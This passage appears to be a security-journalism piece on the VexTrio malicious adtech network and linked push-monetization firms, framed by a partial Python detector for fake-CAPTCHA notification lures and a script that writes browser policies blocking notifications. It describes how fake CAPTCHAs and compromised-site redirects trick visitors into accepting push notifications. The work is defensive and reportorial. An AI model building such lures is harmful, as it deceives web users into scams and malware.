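<button>Continue</button></form></body></html>"""

if __name__ == "__main__":
    for name, page in (("lure", SAMPLE_LURE_PAGE), ("recaptcha", SAMPLE_RECAPTCHA_PAGE)):
        print(name, push_lure_report(page))
```

The verdict deliberately requires both ingredients: a site that asks for notifications honestly has the API call but no coaching text, and a login page behind a real reCAPTCHA has the "not a robot" wording but no permission call, so both come out clean. Pages that render the coaching text from JavaScript or inside an image will slip past the text check; for those, the page's behaviour in an instrumented browser (did a permission prompt appear on first click?) is the reliable signal.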

According to a December 2024 annual report from GoDaddy, nearly 40 percent of compromised websites in 2024 redirected visitors to VexTrio via LosPollos smartlinks.

ADSPRO AND TEKNOLOGY

On November 14, 2024, Qurium published research to support its findings that LosPollos and TacoLoco were services operated by Adspro Group, a company registered in the Czech Republic and Russia, and that Adspro runs its infrastructure at the Swiss hosting providers C41 and Teknology SA.

Qurium noted the LosPollos and TacoLoco sites state that their content is copyrighted by ByteCore AG and SkyForge Digital AG, both Swiss firms that are run by the owner of Teknology SA, Giulio Vitorrio Leonardo Cerutti. Further investigation revealed LosPollos and TacoLoco were apps developed by a company called Holacode, which lists Cerutti as its CEO.

The apps marketed by Holacode include numerous VPN services, as well as one called Spamshield that claims to stop unwanted push notifications. But in January, Infoblox said they tested the app on their own mobile devices, and found it hides the user’s notifications, and then after 24 hours stops hiding them and demands payment. Spamshield subsequently changed its developer name from Holacode to ApLabz, although Infoblox noted that the terms of service for several of the rebranded ApLabz apps still referenced Holacode.

Incredibly, Cerutti threatened to sue me for defamation before I’d even uttered his name or sent him a request for comment (Cerutti sent the unsolicited legal threat back in January after his company and my name were merely tagged in an Infoblox post on LinkedIn about VexTrio).

Asked to comment on the findings by Qurium and Infoblox, Cerutti vehemently denied being associated with VexTrio. Cerutti asserted that his companies all strictly adhere to the regulations of the countries in which they operate, and that they have been completely transparent about all of their operations.

“We are a group operating in the advertising and marketing space, with an affiliate network program,” Cerutti responded. “I am not [going] to say we are perfect, but I strongly declare we have no connection with VexTrio at all.”

“Unfortunately, as a big player in this space we also get to deal with plenty of publisher fraud, sketchy traffic, fake clicks, bots, hacked, listed and resold publisher accounts, etc, etc.,” Cerutti continued. “We bleed lots of money to such malpractices and conduct regular internal screenings and audits in a constant battle to remove bad traffic sources. It is also a highly competitive space, where some upstarts will often play dirty against more established mainstream players like us.”

Working with Qurium, researchers at the security firm Infoblox released details about VexTrio’s infrastructure to their industry partners. Just four days after Qurium published its findings, LosPollos announced it was suspending its push monetization service. Less than a month later, Adspro had rebranded to Aimed Global.

A mind map illustrating some of the key findings and connections in the Infoblox and Qurium investigations. Click to enlarge.

A REVEALING PIVOT

In March 2025, researchers at GoDaddy chronicled how DollyWay — a malware strain that has consistently redirected victims to VexTrio throughout its eight years of activity — suddenly stopped doing that on November 20, 2024. Virtually overnight, DollyWay and several other malware families that had previously used VexTrio began pushing their traffic through another TDS called Help TDS.

Digging further into historical DNS records and the unique code scripts used by the Help TDS, Infoblox determined it has long enjoyed an exclusive relationship with VexTrio (at least until LosPollos ended its push monetization service in November).

In a report released today, Infoblox said an exhaustive analysis of the JavaScript code, website lures, smartlinks and DNS patterns used by VexTrio and Help TDS linked them with at least four other TDS operators (not counting TacoLoco). Those four entities — Partners House, BroPush, RichAds and RexPush — are all Russia-based push monetization programs that pay affiliates to drive signups for a variety of schemes, but mostly online dating services.

“As Los Pollos push monetization ended, we’ve seen an increase in fake CAPTCHAs that drive user acceptance of push notifications, particularly from Partners House,” the Infoblox report reads. “The relationship of these commercial entities remains a mystery; while they are certainly long-time partners redirecting traffic to one another, and they all have a Russian nexus, there is no overt common ownership.”

Renee Burton, vice president of threat intelligence at Infoblox, said the security industry generally treats the deceptive methods used by VexTrio and other malicious TDSs as a kind of legally grey area that is mostly associated with less dangerous security threats, such as adware and scareware.

But Burton argues that this view is myopic, and helps perpetuate a dark adtech industry that also pushes plenty of straight-up malware, noting that hundreds of thousands of compromised websites around the world every year redirect victims to the tangled web of VexTrio and VexTrio-affiliate TDSs.

“These TDSs are a nefarious threat, because they’re the ones you can connect to the delivery of things like information stealers and scams that cost consumers billions of dollars a year,” Burton said. “From a larger strategic perspective, my takeaway is that Russian organized crime has control of malicious adtech, and these are just some of the many groups involved.”

WHAT CAN YOU DO?

As KrebsOnSecurity warned way back in 2020, it’s a good idea to be very sparing in approving notifications when browsing the Web. In many cases these notifications are benign, but as we’ve seen there are numerous dodgy firms that are paying site owners to install their notification scripts, and then reselling that communications pathway to scammers and online hucksters.

If you’d like to prevent sites from ever presenting notification requests, all of the major browser makers let you do this — either across the board or on a per-website basis. While it is true that blocking notifications entirely can break the functionality of some websites, doing this for any devices you manage on behalf of your less tech-savvy friends or family members might end up saving everyone a lot of headache down the road.

To modify site notification settings in Mozilla Firefox, navigate to Settings, Privacy & Security, Permissions, and click the “Settings” tab next to “Notifications.” That page will display any notifications already permitted and allow you to edit or delete any entries. Tick the box next to “Block new requests asking to allow notifications” to stop them altogether.

In Google Chrome, click the icon with the three dots to the right of the address bar, scroll all the way down to Settings, Privacy and Security, Site Settings, and Notifications. Select the “Don’t allow sites to send notifications” button if you want to banish notification requests forever.

In Apple’s Safari browser, go to Settings, Websites, and click on Notifications in the sidebar. Uncheck the option to “allow websites to ask for permission to send notifications” if you wish to turn off notification requests entirely.
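For devices you manage on someone else's behalf, the three per-browser clicks above can be turned into a policy that the user cannot undo. The following is an added example, not code from the article: it writes the Chrome and Firefox enterprise-policy files that block new notification requests, with an optional allow-list for the odd site that genuinely needs them. The file paths are the Linux defaults and are assumptions (on macOS and Windows the same JSON goes in Firefox's distribution folder next to the binary, and Chrome takes the keys from a configuration profile or the registry); the allow-listed hostname is hypothetical.

```python
"""Write managed-browser policies that block new notification requests for
machines you administer. Added example; paths are Linux defaults (assumed)
and the allow-list entries are hypothetical."""
import json
import os
import tempfile

# Relative to the filesystem root so the same code can write into a scratch
# directory for review before touching /etc.
CHROME_POLICY_PATH = "etc/opt/chrome/policies/managed/notifications.json"
FIREFOX_POLICY_PATH = "etc/firefox/policies/policies.json"


def render_policies(allowed_sites=()):
    """Return {relative_path: policy_dict} for Chrome and Firefox.

    Chrome DefaultNotificationsSetting: 1 = allow, 2 = block, 3 = ask (default).
    Firefox BlockNewRequests is the 'Block new requests' checkbox; Locked stops
    the user flipping it back in about:preferences."""
    chrome = {"DefaultNotificationsSetting": 2}
    firefox_notifications = {"BlockNewRequests": True, "Locked": True}
    if allowed_sites:
        # Chrome takes content-settings patterns, Firefox takes origins.
        chrome["NotificationsAllowedForUrls"] = [f"[*.]{host}" for host in allowed_sites]
        firefox_notifications["Allow"] = [f"https://{host}" for host in allowed_sites]
    return {
        CHROME_POLICY_PATH: chrome,
        FIREFOX_POLICY_PATH: {"policies": {"Permissions": {"Notifications": firefox_notifications}}},
    }


def write_policies(root, allowed_sites=()):
    """Write both files under root ('/' for a live install; needs root there)."""
    written = []
    for rel_path, policy in render_policies(allowed_sites).items():
        path = os.path.join(root, rel_path)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            json.dump(policy, fh, indent=2)
        os.chmod(path, 0o644)  # policy files must not be writable by the user
        written.append(path)
    return written


def verify_policies(root):
    """Re-read the files and confirm the blocking settings survived the write."""
    with open(os.path.join(root, CHROME_POLICY_PATH), encoding="utf-8") as fh:
        chrome_ok = json.load(fh).get("DefaultNotificationsSetting") == 2
    with open(os.path.join(root, FIREFOX_POLICY_PATH), encoding="utf-8") as fh:
        notif = json.load(fh)["policies"]["Permissions"]["Notifications"]
    return chrome_ok and notif.get("BlockNewRequests") is True and notif.get("Locked") is True


def dry_run(allowed_sites=("calendar.example.com",)):
    """Write into a scratch directory and return (root, verified) for inspection."""
    root = tempfile.mkdtemp(prefix="browser-policy-")
    write_policies(root, allowed_sites)
    return root, verify_policies(root)


if __name__ == "__main__":
    root, ok = dry_run()
    print("wrote policies under", root, "verified:", ok)
    print("after a live install, confirm at chrome://policy and about:policies")
```

After deploying for real, open chrome://policy and about:policies on the managed machine to confirm the values are being read; a policy file that is ignored because of a permissions or path problem fails silently, which is why the example re-reads what it wrote.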
